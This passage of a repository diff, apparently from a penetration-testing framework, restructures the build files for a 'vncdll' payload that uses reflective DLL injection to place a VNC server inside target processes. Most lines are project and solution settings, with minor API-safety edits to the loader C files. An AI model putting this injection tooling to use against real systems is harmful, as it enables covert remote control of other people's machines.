OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="4"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Debug|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
UseOfMFC="1"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
EnableIntrinsicFunctions="true"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CompileAs="1"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
PreprocessorDefinitions="_X86_"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
AdditionalDependencies="Advapi32.lib ws2_32.lib User32.lib"
OutputFile="release\vncdll.dll"
LinkIncremental="1"
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
RandomizedBaseAddress="1"
DataExecutionPrevention="1"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;release\vncdll.dll&quot; &quot;..\output\&quot;"
/>
</Configuration>
<Configuration
Name="Release|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
UseOfMFC="1"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
EnableIntrinsicFunctions="true"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CompileAs="1"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
PreprocessorDefinitions="_X64_"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
AdditionalDependencies="Advapi32.lib ws2_32.lib User32.lib"
OutputFile="release\vncdll.x64.dll"
LinkIncremental="1"
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
RandomizedBaseAddress="1"
DataExecutionPrevention="1"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;release\vncdll.x64.dll&quot; &quot;..\output\&quot;"
/>
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Source Files"
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
>
<File
RelativePath=".\context.c"
>
</File>
<File
RelativePath=".\loader.c"
>
</File>
<Filter
Name="rdi"
>
<File
RelativePath=".\LoadLibraryR.c"
>
</File>
<File
RelativePath=".\ReflectiveLoader.c"
>
</File>
</Filter>
<Filter
Name="core"
>
<File
RelativePath=".\inject.c"
>
</File>
<File
RelativePath=".\ps.c"
>
</File>
<File
RelativePath=".\session.c"
>
</File>
</Filter>
</Filter>
<Filter
Name="Header Files"
Filter="h;hpp;hxx;hm;inl;inc;xsd"
UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
>
<File
RelativePath=".\context.h"
>
</File>
<File
RelativePath=".\loader.h"
>
</File>
<Filter
Name="rdi"
>
<File
RelativePath=".\LoadLibraryR.h"
>
</File>
<File
RelativePath=".\ReflectiveDLLInjection.h"
>
</File>
<File
RelativePath=".\ReflectiveLoader.h"
>
</File>
</Filter>
<Filter
Name="core"
>
<File
RelativePath=".\inject.h"
>
</File>
<File
RelativePath=".\ps.h"
>
</File>
<File
RelativePath=".\session.h"
>
</File>
</Filter>
</Filter>
<Filter
Name="Resource Files"
Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
>
<File
RelativePath=".\loader.rc"
>
</File>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>

32
external/source/vncdll/make.bat vendored Executable file
View File

@ -0,0 +1,32 @@
@ECHO OFF
IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
IF "%1"=="x86" GOTO BUILD_X86
IF "%1"=="X64" GOTO BUILD_X64
ECHO "Building VNCDLL x64 and x86 (Release)"
SET PLAT=all
GOTO RUN
:BUILD_X86
ECHO "Building VNCDLL x86 (Release)"
SET PLAT=x86
GOTO RUN
:BUILD_X64
ECHO "Building VNCDLL x64 (Release)"
SET PLAT=x64
GOTO RUN
:RUN
PUSHD workspace
msbuild.exe make.msbuild /target:%PLAT%
POPD
GOTO :END
:NEED_VS
ECHO "This command must be executed from within a Visual Studio Command prompt."
ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
:END

19
external/source/vncdll/make.msbuild vendored Executable file
View File

@ -0,0 +1,19 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\vncdll.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86;x64" />
<Target Name="x86">
<Message Text="Building VNCDLL x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="Building VNCDLL x64 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
</Target>
</Project>

BIN
external/source/vncdll/output/vncdll.dll vendored
View File

Binary file not shown.

BIN
external/source/vncdll/output/vncdll.x64.dll vendored
View File

Binary file not shown.

30
external/source/vncdll/winvnc/vncdll.sln → external/source/vncdll/vncdll.sln vendored Normal file → Executable file
View File

@ -1,11 +1,10 @@
Microsoft Visual Studio Solution File, Format Version 10.00
# Visual C++ Express 2008
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "WinVNC.vcproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "winvnc\WinVNC.vcxproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "loader", "..\loader\loader.vcproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
ProjectSection(ProjectDependencies) = postProject
{EA6A09AC-04BB-423D-8842-CA48DF901058} = {EA6A09AC-04BB-423D-8842-CA48DF901058}
EndProjectSection
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vncdll", "vncdll\vncdll.vcxproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
@ -15,19 +14,22 @@ Global
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.Build.0 = Debug|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.Build.0 = Release|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.ActiveCfg = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.Build.0 = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.Build.0 = Debug|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.ActiveCfg = Release|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.Build.0 = Release|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.ActiveCfg = Release|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.Build.0 = Release|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE

0
external/source/vncdll/loader/LICENSE.txt → external/source/vncdll/vncdll/LICENSE.txt vendored
View File

2
external/source/vncdll/loader/context.c → external/source/vncdll/vncdll/context.c vendored Normal file → Executable file
View File

@ -76,7 +76,7 @@ DWORD WINAPI context_message_thread( LPVOID lpParameter )
{
do
{
_snprintf( cNamedPipe, MAX_PATH, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
_snprintf_s( cNamedPipe, MAX_PATH, MAX_PATH - 1, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
dprintf("[LOADER] loader_message_thread. cNamedPipe=%s", cNamedPipe );

0
external/source/vncdll/loader/context.h → external/source/vncdll/vncdll/context.h vendored
View File

2
external/source/vncdll/loader/inject.c → external/source/vncdll/vncdll/inject.c vendored Normal file → Executable file
View File

@ -1,7 +1,7 @@
#include "loader.h"
#include "ps.h"
#include "inject.h"
#include "LoadLibraryR.h"
#include "../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
#include <Tlhelp32.h>
// Simple trick to get the current meterpreters arch

0
external/source/vncdll/loader/inject.h → external/source/vncdll/vncdll/inject.h vendored
View File

5
external/source/vncdll/loader/loader.c → external/source/vncdll/vncdll/loader.c vendored Normal file → Executable file
View File

@ -5,11 +5,12 @@
#include "ps.h"
#include "session.h"
#include "inject.h"
#include "ReflectiveLoader.h"
#define VNCFLAG_DISABLECOURTESYSHELL 1
#define VNCFLAG_DISABLESESSIONTRACKING 2
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
/*
* The HINSTANCE of this injected dll.
*/
@ -173,7 +174,7 @@ DWORD loader_inject_pre( DWORD dwPid, HANDLE hProcess, char * cpCommandLine )
hAgentProcess = hProcess;
_snprintf( cpCommandLine, COMMANDLINE_LENGTH, "/v /c:0x%08X", lpMemory );
_snprintf_s( cpCommandLine, COMMANDLINE_LENGTH, COMMANDLINE_LENGTH - 1, "/v /c:0x%08p", lpMemory );
} while( 0 );

0
external/source/vncdll/loader/loader.h → external/source/vncdll/vncdll/loader.h vendored
View File

18
external/source/vncdll/vncdll/loader.rc vendored Executable file
View File

@ -0,0 +1,18 @@
#ifdef _X64_
#ifdef _DEBUG
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\x64\\winvnc.x64.dll"
#else
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\x64\\winvnc.x64.dll"
#endif
#else
#ifdef _DEBUG
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\Win32\\winvnc.x86.dll"
#else
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\Win32\\winvnc.x86.dll"
#endif
#endif

0
external/source/vncdll/loader/ps.c → external/source/vncdll/vncdll/ps.c vendored
View File

0
external/source/vncdll/loader/ps.h → external/source/vncdll/vncdll/ps.h vendored
View File

6
external/source/vncdll/loader/session.c → external/source/vncdll/vncdll/session.c vendored Normal file → Executable file
View File

@ -18,7 +18,7 @@ DWORD session_id( DWORD dwProcessId )
{
if( !pProcessIdToSessionId )
{
hKernel = LoadLibrary( "kernel32.dll" );
hKernel = LoadLibraryA( "kernel32.dll" );
if( hKernel )
pProcessIdToSessionId = (PROCESSIDTOSESSIONID)GetProcAddress( hKernel, "ProcessIdToSessionId" );
}
@ -53,7 +53,7 @@ DWORD session_activeid()
{
if( !pWTSGetActiveConsoleSessionId )
{
hKernel = LoadLibrary( "kernel32.dll" );
hKernel = LoadLibraryA( "kernel32.dll" );
if( hKernel )
pWTSGetActiveConsoleSessionId = (WTSGETACTIVECONSOLESESSIONID)GetProcAddress( hKernel, "WTSGetActiveConsoleSessionId" );
}
@ -141,7 +141,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer )
CloseHandle( hToken );
}
hKernel = LoadLibrary( "kernel32" );
hKernel = LoadLibraryA( "kernel32" );
if( !hKernel )
break;

0
external/source/vncdll/loader/session.h → external/source/vncdll/vncdll/session.h vendored
View File

245
external/source/vncdll/vncdll/vncdll.vcxproj vendored Executable file
View File

@ -0,0 +1,245 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}</ProjectGuid>
<RootNamespace>vncdll</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>12.0.21005.1</_ProjectFileVersion>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;WIN_X86;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX64</TargetMachine>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
<ResourceCompile>
<PreprocessorDefinitions>_X64_;_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;WIN_X86;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<GenerateDebugInformation>false</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_X64_;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<GenerateDebugInformation>false</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention>
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
<ClCompile Include="context.c" />
<ClCompile Include="loader.c" />
<ClCompile Include="inject.c" />
<ClCompile Include="ps.c" />
<ClCompile Include="session.c" />
</ItemGroup>
<ItemGroup>
